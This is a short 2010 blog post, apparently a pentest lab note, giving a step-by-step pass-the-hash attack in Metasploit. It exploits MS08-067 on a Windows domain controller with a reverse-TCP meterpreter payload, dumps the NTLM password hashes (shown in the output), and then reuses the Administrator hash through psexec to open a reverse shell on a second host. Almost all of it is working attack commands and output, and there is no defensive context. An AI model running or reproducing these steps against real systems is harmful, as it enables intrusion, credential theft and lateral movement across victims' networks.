Thursday, May 13, 2010

SMB Pass the Hash

Step 1:
Get the hashes from the target machine (eq. LON-DC1 = 192.168.1.200)
msf > use windows/smb/ms08_067_netapi
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set RHOST 192.168.1.200
msf > set LHOST 192.168.1.252
msf > set LPORT 443
msf > set TARGET 7
msf > exploit

meterpreter > run hashdump

Administrator:500:921988ba001dc8e14a3b108f3fa6cb6d:e19ccf75ee54e06b06a5907af13cef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Step 2:
Copy the hash then pass the hash by using psexec

msf > use windows/smb/psexec
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set RHOST 192.168.1.110
msf > set LHOST 192.168.1.252
msf > set LPORT 6666
msf > set SMBUser Administrator
msf > set SMBPass 921988ba001dc8e14a3b108f3fa6cb6d:e19ccf75ee54e06b06a5907af13cef42
msf > exploit
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)